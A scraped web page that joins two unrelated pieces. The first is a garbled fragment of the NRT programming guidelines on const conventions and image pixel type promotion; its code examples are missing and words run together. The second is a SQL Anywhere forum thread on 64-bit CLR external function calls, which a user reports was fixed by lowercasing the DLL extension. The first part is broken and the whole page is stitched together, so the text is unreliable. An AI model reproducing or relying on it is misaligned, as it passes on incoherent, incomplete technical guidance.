~/.bash_aliases or
~/.bashrc:
# do a grep on nrt sources: ng () { grep $* `${NRTHOME}/scripts/list-sources.sh` }
You can use it as follows, for example to find all files that refer to the
Skeleton class:
itti@iLab1:~/nrt$ ng Skeleton include/nrt/Graphics/ShapeRenderer.H: namespace mocap { class Skeleton; } include/nrt/Graphics/ShapeRenderer.H: std::map<std::string, nrt::graphics::mocap::Skeleton> & skeletons(); include/nrt/Graphics/ShapeRenderer.H: std::map<std::string, nrt::graphics::mocap::Skeleton> itsSkeletons; ...
NRT uses exclusively the right-to-left convention for const qualifications. This is because it is the best way to unambiguously read statements that have const in them, just read them aloud from right to left. For example:
See for more details and examples. Also see this one: and that one:
mutable, which will allow it to be locked/unlocked even in const member functions of the class.
const_castinside the function. For example, consider the BlackboardUID class:
str()function just returns the UID as a string, so it should be const. However, as noted in the comments, because Blackboard is a Singleton and it has a UID, there is a chicken-and-egg problem with initializing the UID, so we here decide to initialize it the first time it is used. Hence the implementation looks like this:
const_castto set member variable strID the first time it is requested.
Example:
If you have used iNVT in the past, here are some key syntax differences:
There are also similar differences with Dims.H, Rectangle.H, etc
shared_ptr. In particular:
class PixTypeas the pixel type; for example:
class Tas the underlying type for the specified pixels; for example, since the following function is to colorize a gray image, the input image should always have gray pixels, and the return image should always have color pixels:
Return types should be promoted according to the C/C++ integral type promotion rules. For example, a function that adds two images with byte pixels should have int pixels in the result. Several helper classes and macros are available in NRT to allow this; see Pixels.H, PixelTypes.H, and nrt/Core/Typing/Macros.H. The 3 macros below require that your input image pixels will be named
PixType and your output image pixels will be named
DestType:
typas the default promotion; this basically defines
DestType = typename nrt::promote<PixType, promo>::typeas the default destination type and
promohas a default value
typ.
DestType = typename nrt::promote<PixType, promo>::typebut
promohas no default value. Use this to remind users that some promotion will occur due to the operation, ane they need to think about what that should be and then call the proper version of your function (note that
voidis a valid
promovalue, see nrt::promote).
PixTypeand
DestType
For example:
The result image will have a promoted type, this is because this operation needs to compute weighted averages among pixels, so the weighted sum will have to be in a promoted type. By not providing a default promo, users will have to call the function as such:
Note that with a
void promotion the results are converted back to the same precision as the source, using nrt::clamped_convert (there is a CPU cost to this as it checks for overflows, e.g., an int value of 300 converted back to byte will be 255). See clamped_convert for details.
Inside the implementation of your function, you should be able to only use
PixType and
DestType. For example:
You should always try to also write a GenericImage version of your image processing function. GenericImage represents an Image of any pixel type (or almost, there actually is a list in the declaration of GenericImage for all the supported pixels). GenericImage is what we pass between modules in messages, so that users do not have to insert annoying image conversion modules when they build a high-level system.
To use GenericImage you need to:
PixTypeand
DestTypeas explained above; | http://nrtkit.net/documentation/pm_ProgrammingGuidelines.html | CC-MAIN-2018-51 | en | refinedweb |
Can anyone verify that in SA 11.0.1 running on W2K8 x64 can make external function call to .Net C# dll? I am getting object reference error on the call into the dll. Dll has simple static function to return 1. Dll was compiled using csc /t:library /out:my.dll /platform:x64
The setup I have works if using SA 11.0.1 on W2K3 x86 with same dll recompiled for x86.
So it can't be the code.
asked
07 Jun '11, 12:32
JerryY
31●3●3●4
accept rate:
0%
This configuration should work. Can you confirm which version of the database server is being launched? Is it being launched from the bin32 or the bin64 directory? Is dbextclr11.exe being launched successfully?
Can you provide the SQL procedure you used to create the external function call?
The command used to launch SA database is using bin64.
When I make my function call, I see that dbextclr11.exe is launched.
My dll code in VS2008 using 2.0 Framework:
namespace CLRDLL
{
public class StaticTest
{
public static int GetValue()
{ return 1; }
}
}
I build the dll and copy it into the bin64 folder of SA.
My function in SA:
ALTER FUNCTION "ev"."fn_clr_test"()
returns integer
external name 'CLRDLL.DLL::CLRDLL.StaticTest.GetValue() int' language CLR
It's important to know that the server is Win2008 R2 running x64.
Error message I get is:
Procedure 'fn_clr_test' terminated with unhandled exception 'Object
reference not set to an instance of an object.'
SQLCODE=-91, ODBC 3 State="HY000"
Here is what I think might be happening in your particular case. In SQL Anywhere 11, the dbextclr11.exe is built with /platform:anycpu. The same is true for the SQL Anywhere .NET Provider which the CLR external environment makes use of. The SA .NET Provider attempts to load some native pieces, including the SQL Anywhere language dll. If the provider ends up loading the 32-bit language dll instead of the 64-bit language dll, then the framework will (most likely) expect everything to work in a 32-bit environment. Hence a dll that is built /platform:x64 will not load as a result. Have a look at your path variable and see if bin32 appears before bin64. That might be why the 32-bit language dll is being loaded. If bin32 does appear before bin64, then try switching the two around within the path and see if that solves the problem. Of course, the other thing you can do is build your dll with /platform:anycpu if possible.
Note that this problem is resolved in SQL Anywhere 12 since the dbextclr12.exe is now built specifically with /platform:x86 (for the bin32 one) and /platform:x64 (for the bin64 one).
answered
07 Jun '11, 16:34
Karim Khamis
5.6k●5●38●70
accept rate:
40%
I've verified that path has SAbin64 before bin32. still get the error. I've recompiled dll using /platform:anycpu, still same problem.
I would like to know if anyone out there actually has a working combination of Windows 2008 R2 x64 server + SA 11.0.1 running x64 engine + making external CLR function call ?
Or am I just trying to do something that doesn't work?
Yes, I just tried using a 64-bit SA 11 server and the CLR external environment and it worked fine. I must point out though that I had to compile my test dll using /platform:anycpu due to a build environment issue on my machine, but it did work fine.
Do you have the SA 11 32-bit installed also? That is what my server configuration has both 32 and 64 SA installed. I'm wondering if that is the issue. I'm going to uninstall SA and only install the x64 SA. And see...
Karim, were you running SA on Win2008 server?
After installing only x64 version of SA ... Still the same error.
Yes, I do have both 32 and 64 bit installations on my machine (out of necessity). I think you may have run into a valid bug. If possible, please open a support case and hopefully we will be able to reproduce and resolve the problem that you are running into.
i do have a case open but was hoping that i could find someone who has actually ran into my issue on the forum. Case #11675012
By the way, are you by any chance renaming your dll? It seems like the framework does not like it when you rename the dll to have a name other than what you built the dll as. For example, when I build my test dll using csc and explicitly name the dll as clrtest.dll. All works fine as long as I keep the dll named clrtest.dll. If, however, I rename the dll to be myclrtest.dll, then I suddenly start getting the error you are seeing.
We think we might have solved this problem. Can you please try the following...
Instead of creating your function as:
ALTER FUNCTION "ev"."fn_clr_test"() returns integer external name
'CLRDLL.DLL::CLRDLL.StaticTest.GetValue() int' language CLR
can you instead try:
ALTER FUNCTION "ev"."fn_clr_test"() returns integer external name
'CLRDLL.dll::CLRDLL.StaticTest.GetValue() int' language CLR
Let me know if that is sufficient to work around the problem for you. In the meantime, we will try and put together a proper fix.
Karim
answered
08 Jul '11, 11:19
Karim,
Thanks. That worked.
...whoa! I had to do a file compare to see the difference, must have SET OPTION case_blindness = 'ON' :)
Thanks for verifying the work around. The proper fix has been put into SA 11.0.1 build 2634 and up.
... You're asking for age sensitivity?:)
Me too, so for all others the difference is the lowercase of the dll extension.
Once you sign in you will be able to subscribe for any updates here
Answers
Answers and Comments
Markdown Basics
learn more about Markdown
Question tags:
.net ×61
clr ×17
question asked: 07 Jun '11, 12:32
question was seen: 2,034 times
last updated: 15 Sep '11, 02:59
CLR external environment .Net 4.5 support
external environment clr call succeeds without effort
Problem setting up CLR environment for .NET 4.5
object o = myCmd.ExecuteScalar() unexpectedly returns null?
SQLE_TOO_MANY_TEMP_TABLES - random error
ASA9, .NET provider close connection problem
Using data provider for EF4.x and EF6 in parallel
Start a thread from CLR when called from SQL Anywhere
CLR with depencies, does not work
Inserting row through .NET ODBC driver
SQL Anywhere Community Network
Forum problems?
Maintenance log
and OSQA
Disclaimer: Opinions expressed here are those of the poster and do not
necessarily reflect the views of the company.
First time here? Check out the FAQ! | https://sqlanywhere-forum.sap.com/questions/5648/w2k8-x64-and-external-clr-function-calls | CC-MAIN-2018-51 | en | refinedweb |
Ok, I'm gonna explain this as best I can.
I am trying to make an if/else statement in python that basically informs the user if they put in the right age based on raw input, but I keep getting an error in terms of my if statement. Can I get some help?
from datetime import datetime now = datetime.now() print '%s/%s/%s %s:%s:%s' % (now.month, now.day, now.year, now.hour,now.minute, now.second) print "Welcome to the beginning of a Awesome Program created by yours truly." print " It's time for me to get to know a little bit about you" name = raw_input("What is your name?") age = raw_input("How old are you?") if age == 1 and <= 100 print "Ah, so your name is %s, and you're %s years old. " % (name, age) else: print " Yeah right!" | http://www.howtobuildsoftware.com/index.php/how-do/bFg/python-if-statement-if-else-problems-in-python | CC-MAIN-2018-51 | en | refinedweb |
Derek Richardson wrote:
I believe that that will not guarantee a *universally* unique id, but only an id unique within that ZODB. Am I wrong?The RFC prescribes a specific algorithm for generating universally unique IDs.The RFC prescribes a specific algorithm for generating universally unique IDs.
Of course, they are only "universally unique" in a probabilistic way.It wouldn't be difficult to salt the integer IDs such that they generate UUIDs that are as likely as any other to be unique. Something like this would work:
import uuid int_id = 42 salt = 0x32352352353243263235235235324326 print uuid.UUID('%X' % (int_id ^ salt))Another option would be to create an IOBtree to map each object's intid to a randomly generated UUID (generated by the uuid.uuid1 method from the earlier referenced module).
-- Benji York Senior Software Engineer Zope Corporation _______________________________________________ Zope3-users mailing list Zope3-users@zope.org | https://www.mail-archive.com/zope3-users@zope.org/msg05553.html | CC-MAIN-2018-51 | en | refinedweb |
Overview
Atlassian Sourcetree is a free Git and Mercurial client for Windows.
Atlassian Sourcetree is a free Git and Mercurial client for Mac.
REWORK
This is a python task scheduling and execution tool, which needs only python and Postgres to work (using sqlalchemy).
Principles.
Basic usage
Setting up a database
You need a postgresql database. Rework will install its tables into its own
Declaring and scheduling a task deploy postgres://babar:password@localhost:5432/jobstore
Then, the script will quickly terminate, as both tasks have been executed.
API
The
api module exposes most if what is needed. The
task module
and task objects provide the rest.
api module
Three functions are provided: the
task decorator, the
freeze_operations and
schedule functions.
Defining tasks is done using the
task decorator:
from rework.api import task @task def my') task = api.schedule(engine, 'my_task', 42)
The
schedule function wants these mandatory parameters:
engine: sqlalchemy engine
task name: string
task input: any python picklable object
It also accepts two more options:
hostid: an host identifier (e.g. '192.168.1.1')
metadata: a json-serializable dictionary (e.g. {'user': 'Babar'})
Task objects
Task objects can be obtained from the
schedule api call (as seen in the
previous example) or through the
task module.
from task import Task task = task.by_id(42)
The task object provides:
.stateattribute to describe the task state (amongst:
queued,
running,
aborting,
aborted,
failed,
done)
.join()method to wait synchronously for the task completion
.capturelogs(sync=True, level=logging.NOTSET, std=False)method to record matching logs into the db (
synccontrols whether the logs are written synchronously,
levelspecifies the capture level,
stdpermits to also record prints as logs)
.inputattribute to get the task input (yields any object)
.save_output(<obj>)method to store any object
.abort()method to preemptively stop the task
.log(fromid=None)method to retrieve the task logs (all or from a given log id)
Command line
Operations
If you read the previous chapter, you already know the
init-db and
deploy commands.
The
rework command, if typed without subcommand, shows its usage:
$ rework Usage: rework [OPTIONS] COMMAND [ARGS]... Options: --help Show this message and exit. Commands: abort-task deploy init-db kill-worker list-operations list-tasks list-workers log-task new-worker shutdown-worker vacuum
Of those commands,
new-worker is for purely internal purposes, and
unless you know what you're doing, should]
Extensions. | https://bitbucket.org/pythonian/rework/ | CC-MAIN-2018-51 | en | refinedweb |
I have a shortcut I am going to be deploying to all of our end user workstations. It is currently configured to open an IE window in a maximized screen (using the shortcut properties) and open a specific URL.
This particular web application is very sensitive to screen resolution. If IE opens in a non-maximized screen it freaks out and doesn't format the content correctly.
The way I have the shortcut set right now works OK, but it would be even better if it forced it open into kiosk mode so it took up all the screen real estate possible.
The problem with using "iexplore.exe -k" is that it really locks the browser down. No address bar, no way to exit the program short of an Alt-F4. What I want it to do is behave exactly as if the user had pressed F11 to enter fullscreen mode, so that the address bar is available if you mouse up to the top of the screen and you can also just press F11 to go back to a maximized window again.
Is there a way I can do this with a shortcut? For now I'm training my users to open the shortcut and then immediately press F11, but I'd like that to be a little simpler for them.
10 Replies
Give this a go - it get it to start using a script at startup -
From this:...
If you are trying to open Internet Explorer in Maximized view, then follow these steps:
a. Right click on Internet Explorer icon.
b. Click on Properties.
c. Under the Shortcut tab, click on the drop down next to Run.
d. In the drop down options select Maximized.
e. Click Apply and OK.
f. Now check if it works.
1. Procon Latte Content Filter 3.3 - The blacklist / whitelist plugin used to lock down web access to allow only the sites we want accessed from the catalogs. This plugin has password protection integrated so it cannot be easily bypassed. If a patron attempts to go to an unauthorized website, which they can only try if Firefox is not in full screen mode, they are given the following message:
“We’re sorry, that website cannot be viewed on this terminal. To browse the web, please logon to an Internet station.”
2. Menu Editor 1.2.7 - Provides customization / elimination of all menus, including right-click menus, in Firefox. This makes it more difficult for a patron to try to get around our restrictions.
3. Reset Kiosk 0.4 - Closes all tabs, brings up the home page and reactivates full screen mode if not already the current mode, all after a configurable time period of inactivity.
We’ve also created the following script file to remove the visible ways of exiting full screen mode or Firefox, as well as the back and forward buttons but still display the bookmarks:
File:
C:\Documents and Settings\USER\Application Data\Mozilla\Firefox\Profiles\XXX.default\chrome\userChrome.css
Script:
@namespace url(""); /* only needed once */
#autohide-context { display:none!important; } /* hide context menuitem "Exit Full Screen Mode" */
#window-controls { display:none!important; } /* hide window controls in full screen mode */
#back-button { display:none!important; } /* hide back button */
#forward-button { display:none!important; } /* hide forward button */
#PersonalToolbar { visibility:visible!important; } /* display the bookmark toolbar */
We can exit full screen mode by pressing F11. Pressing F11 again re-enters full screen mode.
We can exit by pressing ALT-F4.
We can access the plugins configuration by entering "about:addons" in the address bar.
The icons that were on the desktop before these changes were made are still there so that patrons can still get to things if someone closes Firefox using ALT-F4.
Brand Representative for KioWare Kiosk Software
Brand Representative for KioWare Kiosk Software
Not sure what you are working to accomplish and kiosk mode can do a lot, but here's some information that might help with the limitations. . . An article about Chrome Kiosk mode and one about kiosk mode in general.
I'm always interested in making improvement to these articles, so feel free to respond here with any additional feedback.
LauraEdited May 30, 2014 at 14:17 UTC | https://community.spiceworks.com/topic/501886-can-i-force-ie-into-a-friendly-kiosk-mode | CC-MAIN-2018-51 | en | refinedweb |
Hi, I recently developed a program which has source and header files in vc++! what I want to do is convert the same in C#. I got the idea of source files but how to import/use header files in C#(I want seperate file for class creation/ data initialization like header files)? help me!
- 3 Contributors
- forum4 Replies
- 103 Views
- 6 Years Discussion Span
- comment Latest Post by JMC31337
C# does not use header files.
Everything is contained in the class itself.
The framework reads the "assembly" to determine what is available to other classes that call it.
You can put your classes in separate files or in separate projects.
Even if you are calling them from c++, you won't need a header.
Edited by thines01: n/a
old topic but if you want to use .h files with C# it really depends upon what youre trying to accomplish:
For instance i am writing a memorystream picture box that will display a bitmap
So i used bin2c to create the .h header file which contains my bitmap as a byte array which can be streamed
so it would be something like
bin2c -o bit.h image.bmp
Bin2c will creat the bit.h with the file array as a:
/* Generated by bin2c, do not edit manually */ /* Contents of file fake_login1.bmp */ const long int fake_login1_bmp_size = 37676; const unsigned char fake_login1_bmp[37676] = { ... array of bytes ... }
delete the const long int fake_login1_bmp_size = 37676;
change the const unsigned char fake_login1_bmp[37676] to:
public static byte[] bit = { ... array of bytes .. }
add the class
so in all it would look like:
/* Generated by bin2c, do not edit manually */ public class Test { public static byte[] bit = { .. array ...}; }
then to compile the header with your app:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc /target:exe /out:123.exe 123.cs bit.h
===================
to actually use the header byte array it would be something like:
System.Drawing.Image newImage;
MemoryStream stream = new MemoryStream(Test.bit);
newImage = System.Drawing.Image.FromStream(stream);
its basically creating a class which only contains your "data" or "variable" which yu can call.. make sure its a public class and a public static "variable" ie: byte[] array so that it can be accessed by any function
Lastly: if youre trying to use .h files which contain functions written for C++
its not going to happen, you'll need to convert the C++ API into the C# API with [DLLImport]
If its a C# class within a .h file its no different than that of main.cs class1.cs class2.cs class3.h class4.h
Edited by JMC31337 | https://www.daniweb.com/programming/software-development/threads/412965/how-to-use-header-h-files-in-c | CC-MAIN-2018-51 | en | refinedweb |
Defining an Enum
Let’s look at a situation we might want to express in code and see why enums are useful and more appropriate than structs in this case. Say we need to work with IP addresses. Currently, two major standards are used for IP addresses: version four and version six. These are the only possibilities for an IP address that our program will come across: we can enumerate all possible values, which is where enumeration gets its name.
Any IP address can be either a version four or a version six address, but not both at the same time. That property of IP addresses makes the enum data structure appropriate, because enum values can only be one of the variants. Both version four and version six addresses are still fundamentally IP addresses, so they should be treated as the same type when the code is handling situations that apply to any kind of IP address.
We can express this concept in code by defining an
IpAddrKind enumeration and
listing the possible kinds an IP address can be,
V4 and
V6. These are known
as the variants of the enum:
# #![allow(unused_variables)] #fn main() { enum IpAddrKind { V4, V6, } #}
IpAddrKind is now a custom data type that we can use elsewhere in our code.
Enum Values
We can create instances of each of the two variants of
IpAddrKind like this:
# #![allow(unused_variables)] #fn main() { # enum IpAddrKind { # V4, # V6, # } # let four = IpAddrKind::V4; let six = IpAddrKind::V6; #}
Note that the variants of the enum are namespaced under its identifier, and we
use a double colon to separate the two. The reason this is useful is that now
both values
IpAddrKind::V4 and
IpAddrKind::V6 are of the same type:
IpAddrKind. We can then, for instance, define a function that takes any
IpAddrKind:
# #![allow(unused_variables)] #fn main() { # enum IpAddrKind { # V4, # V6, # } # fn route(ip_type: IpAddrKind) { } #}
And we can call this function with either variant:
# #![allow(unused_variables)] #fn main() { # enum IpAddrKind { # V4, # V6, # } # # fn route(ip_type: IpAddrKind) { } # route(IpAddrKind::V4); route(IpAddrKind::V6); #}
Using enums has even more advantages. Thinking more about our IP address type, at the moment we don’t have a way to store the actual IP address data; we only know what kind it is. Given that you just learned about structs in Chapter 5, you might tackle this problem as shown in Listing 6-1:
# #![allow(unused_variables)] #fn main() { enum IpAddrKind { V4, V6, } struct IpAddr { kind: IpAddrKind, address: String, } let home = IpAddr { kind: IpAddrKind::V4, address: String::from("127.0.0.1"), }; let loopback = IpAddr { kind: IpAddrKind::V6, address: String::from("::1"), }; #}
Listing 6-1: Storing the data and
IpAddrKind variant of
an IP address using a
struct
Here, we’ve defined a struct
IpAddr that has two fields: a
kind field that
is of type
IpAddrKind (the enum we defined previously) and an
address field
of type
String. We have two instances of this struct. The first,
home, has
the value
IpAddrKind::V4 as its
kind with associated address data of
127.0.0.1. The second instance,
loopback, has the other variant of
IpAddrKind as its
kind value,
V6, and has address
::1 associated with
it. We’ve used a struct to bundle the
kind and
address values together, so
now the variant is associated with the value.
We can represent the same concept in a more concise way using just an enum,
rather than an enum inside a struct, by putting data directly into each enum
variant. This new definition of the
IpAddr enum says that both
V4 and
V6
variants will have associated
String values:
# #![allow(unused_variables)] #fn main() { enum IpAddr { V4(String), V6(String), } let home = IpAddr::V4(String::from("127.0.0.1")); let loopback = IpAddr::V6(String::from("::1")); #}
We attach data to each variant of the enum directly, so there is no need for an extra struct.
There’s another advantage to using an enum rather than a struct: each variant
can have different types and amounts of associated data. Version four type IP
addresses will always have four numeric components that will have values
between 0 and 255. If we wanted to store
V4 addresses as four
u8 values but
still express
V6 addresses as one
String value, we wouldn’t be able to with
a struct. Enums handle this case with ease:
# #![allow(unused_variables)] #fn main() { enum IpAddr { V4(u8, u8, u8, u8), V6(String), } let home = IpAddr::V4(127, 0, 0, 1); let loopback = IpAddr::V6(String::from("::1")); #}
We’ve shown several different ways to define data structures to store version
four and version six IP addresses. However, as it turns out, wanting to store
IP addresses and encode which kind they are is so common that the standard
library has a definition we can use! Let’s look at how
the standard library defines
IpAddr: it has the exact enum and variants that
we’ve defined and used, but it embeds the address data inside the variants in
the form of two different structs, which are defined differently for each
variant:
# #![allow(unused_variables)] #fn main() { struct Ipv4Addr { // --snip-- } struct Ipv6Addr { // --snip-- } enum IpAddr { V4(Ipv4Addr), V6(Ipv6Addr), } #}
This code illustrates that you can put any kind of data inside an enum variant: strings, numeric types, or structs, for example. You can even include another enum! Also, standard library types are often not much more complicated than what you might come up with.
Note that even though the standard library contains a definition for
IpAddr,
we can still create and use our own definition without conflict because we
haven’t brought the standard library’s definition into our scope. We’ll talk
more about bringing types into scope in Chapter 7.
Let’s look at another example of an enum in Listing 6-2: this one has a wide variety of types embedded in its variants:
# #![allow(unused_variables)] #fn main() { enum Message { Quit, Move { x: i32, y: i32 }, Write(String), ChangeColor(i32, i32, i32), } #}
Listing 6-2: A
Message enum whose variants each store
different amounts and types of values
This enum has four variants with different types:
Quithas no data associated with it at all.
Moveincludes an anonymous struct inside it.
Writeincludes a single
String.
ChangeColorincludes three
i32values.
Defining an enum with variants like the ones in Listing 6-2 is similar to
defining different kinds of struct definitions, except the enum doesn’t use the
struct keyword and all the variants are grouped together under the
type. The following structs could hold the same data that the preceding enum
variants hold:
# #![allow(unused_variables)] #fn main() { struct QuitMessage; // unit struct struct MoveMessage { x: i32, y: i32, } struct WriteMessage(String); // tuple struct struct ChangeColorMessage(i32, i32, i32); // tuple struct #}
But if we used the different structs, which each have their own type, we
couldn’t as easily define a function to take any of these kinds of messages as
we could with the
Message enum defined in Listing 6-2, which is a single type.
There is one more similarity between enums and structs: just as we’re able to
define methods on structs using
impl, we’re also able to define methods on
enums. Here’s a method named
call that we could define on our
Message enum:
# #![allow(unused_variables)] #fn main() { # enum Message { # Quit, # Move { x: i32, y: i32 }, # Write(String), # ChangeColor(i32, i32, i32), # } # impl Message { fn call(&self) { // method body would be defined here } } let m = Message::Write(String::from("hello")); m.call(); #}
The body of the method would use
self to get the value that we called the
method on. In this example, we’ve created a variable
m that has the value
Message::Write(String::from("hello")), and that is what
self will be in the
body of the
call method when
m.call() runs.
Let’s look at another enum in the standard library that is very common and
useful:
Option.
The
Option Enum and Its Advantages Over Null Values
In the previous section, we looked at how the
IpAddr enum let us use Rust’s
type system to encode more information than just the data into our program.
This section explores a case study of
Option, which is another enum.
Programming language design is often thought of in terms of which features you include, but the features you exclude are important too. Rust doesn’t have the null feature that many other languages have. Null is a value that means there is no value there. In languages with null, variables can always be in one of two states: null or not-null.
In his 2009 presentation “Null References: The Billion Dollar Mistake,” Tony Hoare, the inventor of null, has this to say:.
The problem with null values is that if you try to use a null value as a not-null value, you’ll get an error of some kind. Because this null or not-null property is pervasive, it’s extremely easy to make this kind of error.
However, the concept that null is trying to express is still a useful one: a null is a value that is currently invalid or absent for some reason.
The problem isn’t really with the concept but with the particular
implementation. As such, Rust does not have nulls, but it does have an enum
that can encode the concept of a value being present or absent. This enum is
Option<T>, and it is defined by the standard library
as follows:
# #![allow(unused_variables)] #fn main() { enum Option<T> { Some(T), None, } #}
The
Option<T> enum is so useful that it’s even included in the prelude; you
don’t need to bring it into scope explicitly. In addition, so are its variants:
you can use
Some and
None directly without the
Option:: prefix. The
Option<T> enum is still just a regular enum, and
Some(T) and
None are
still variants of type
Option<T>.
The
<T> syntax is a feature of Rust we haven’t talked about yet. It’s a
generic type parameter, and we’ll cover generics in more detail in Chapter 10.
For now, all you need to know is that
<T> means the
Some variant of the
Option enum can hold one piece of data of any type. Here are some examples of
using
Option values to hold number types and string types:
# #![allow(unused_variables)] #fn main() { let some_number = Some(5); let some_string = Some("a string"); let absent_number: Option<i32> = None; #}
If we use
None rather than
Some, we need to tell Rust what type of
Option<T> we have, because the compiler can’t infer the type that the
Some
variant will hold by looking only at a
None value.
When we have a
Some value, we know that a value is present and the value is
held within the
Some. When we have a
None value, in some sense, it means
the same thing as null: we don’t have a valid value. So why is having
Option<T> any better than having null?
In short, because
Option<T> and
T (where
T can be any type) are different
types, the compiler won’t let us use an
Option<T> value as if it were
definitely a valid value. For example, this code won’t compile because it’s
trying to add an
i8 to an
Option<i8>:
let x: i8 = 5; let y: Option<i8> = Some(5); let sum = x + y;
If we run this code, we get an error message like this:
error[E0277]: the trait bound `i8: std::ops::Add<std::option::Option<i8>>` is not satisfied --> | 5 | let sum = x + y; | ^ no implementation for `i8 + std::option::Option<i8>` |
Intense! In effect, this error message means that Rust doesn’t understand how
to add an
i8 and an
Option<i8>, because they’re different types. When we
have a value of a type like
i8 in Rust, the compiler will ensure that we
always have a valid value. We can proceed confidently without having to check
for null before using that value. Only when we have an
Option<i8> (or
whatever type of value we’re working with) do we have to worry about possibly
not having a value, and the compiler will make sure we handle that case before
using the value.
In other words, you have to convert an
Option<T> to a
T before you can
perform
T operations with it. Generally, this helps catch one of the most
common issues with null: assuming that something isn’t null when it actually
is.
Not having to worry about incorrectly assuming a not-null value helps you to be
more confident in your code. In order to have a value that can possibly be
null, you must explicitly opt in by making the type of that value
Option<T>.
Then, when you use that value, you are required to explicitly handle the case
when the value is null. Everywhere that a value has a type that isn’t an
Option<T>, you can safely assume that the value isn’t null. This was a
deliberate design decision for Rust to limit null’s pervasiveness and increase
the safety of Rust code.
So, how do you get the
T value out of a
Some variant when you have a value
of type
Option<T> so you can use that value? The
Option<T> enum has a large
number of methods that are useful in a variety of situations; you can check
them out in its documentation. Becoming familiar with
the methods on
Option<T> will be extremely useful in your journey with Rust.
In general, in order to use an
Option<T> value, you want to have code that
will handle each variant. You want some code that will run only when you have a
Some(T) value, and this code is allowed to use the inner
T. You want some
other code to run if you have a
None value, and that code doesn’t have a
T
value available. The
match expression is a control flow construct that does
just this when used with enums: it will run different code depending on which
variant of the enum it has, and that code can use the data inside the matching
value. | https://doc.rust-lang.org/book/ch06-01-defining-an-enum.html | CC-MAIN-2018-51 | en | refinedweb |
Thanks Andrew. As very correctly suggested by you i already have the code in
backing bean to clear the backing bean properties. But the problem is when i
move back and forth (i.e. navigate) from Current page to Other pages and
come back to Current page, i want the backing bean associated with the
current page to be re-created i.e. new instance of backing bean.
Ofcourse i wanna clear the data on form fields
Andrew Robinson-5 wrote:
>
> I didn't mean to clear the form, but clear the backing bean properties.
>
> public class MyBean {
> private MyObject myObject;
>
> public String save() {
> // EntityManager or hibernate session save here
> // clear the properties:
> clearState();
> }
>
> public void onCancel(ActionEvent evt) {
> clearState();
> }
>
> private void clearState() {
> myObject = null;
> }
> }
>
> On 6/13/07, bansi <mail2bansi@yahoo.com> wrote:
>>
>> I figured out that i can do something like this ...
>> In session scope, only one instance of the backing bean will be used
>> during
>> the whole browser session. When you want to recreate the managed bean
>> inside
>> the backing bean during session, then do
>> FacesContext
>> .getCurrentInstance()
>> .getExternalContext()
>> .getSessionMap()
>> .put("myBean", new MyBean());
>>
>> BUT i am not sure where to put this snippet of code.
>>
>>
>>
>> bansi wrote:
>> >
>> > Andrew
>> > I totally agree with you on "its the desired behavior of a session bean
>> --
>> > one instance for the
>> > user's session"
>> > But is their a way to recreate the instance of backing bean in
>> following
>> > situations
>> > 1) Whenever a new record is inserted into database. The reason i
>> mention
>> > this is my backing bean instantiates the pojo and for subsequent save
>> into
>> > database the backing bean holds onto the old instance of pojo having
>> same
>> > identifier (ID) value. This is exactly the reason Hibernate throws
>> > Detached Object Exception passed to Persist
>> >
>> > 2) Whenever i navigate between JSF pages , i wanna backing bean to be
>> > re-initialized i.e. re-created with new instance
>> >
>> > Please note as suggested by you i am not looking to clear off the
>> fields
>> > on the form whereas i want to recreate the whole backing bean itself
>> >
>> > Any pointers/suggestions highly appreciated
>> >
>> > Regards
>> > Bansi
>> >
>> >
>> > Andrew Robinson-5 wrote:
>> >>
>> >> That is the desired behavior of a session bean -- one instance for the
>> >> user's session. If you want to use session, and have it be able to be
>> >> cleared, then you will want to create a clear action or action
>> >> listener method that clears all of the member variables when executed.
>> >>
>> >> I would instead recommend using conversational scope from JBoss-Seam
>> >> or MyFaces or request scope and use saveState as needed to persist
>> >> values across pages.
>> >>
>> >> -Andrew
>> >>
>> >> On 6/13/07, bansi <mail2bansi@yahoo.com> wrote:
>> >>>
>> >>> We have backing bean defined in "session" scope
>> >>> So whenever we do a submit on JSF Form, it holds onto same backing
>> bean.
>> >>> This is not desirable as
>> >>> -> The Form will have different set of values each time it does
a
>> >>> submit
>> >>> -> The Backing bean has variable defined to instantiate a POJO
>> >>> i.e.private
>> >>> MyPojo pojo = new MyPojo();
>> >>> So every time JSF form submits to the backing bean, it holds onto the
>> >>> same
>> >>> instance of POJO which eventually results in insertion problems into
>> >>> database i.e. having same Identifier (ID) value
>> >>> -> The same problem occurs if i navigate to different page and come
>> back
>> >>> to
>> >>> original page
>> >>>
>> >>> Is their a way to re-initialize the Backing Bean ???
>> >>> --
>> >>> View this message in context:
>> >>>
>>
>> >>> Sent from the MyFaces - Users mailing list archive at Nabble.com.
>> >>>
>> >>>
>> >>
>> >>
>> >
>> >
>>
>> --
>> View this message in context:
>>
>> Sent from the MyFaces - Users mailing list archive at Nabble.com.
>>
>>
>
>
--
View this message in context:
Sent from the MyFaces - Users mailing list archive at Nabble.com. | http://mail-archives.apache.org/mod_mbox/myfaces-users/200706.mbox/%3C11113434.post@talk.nabble.com%3E | CC-MAIN-2018-51 | en | refinedweb |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.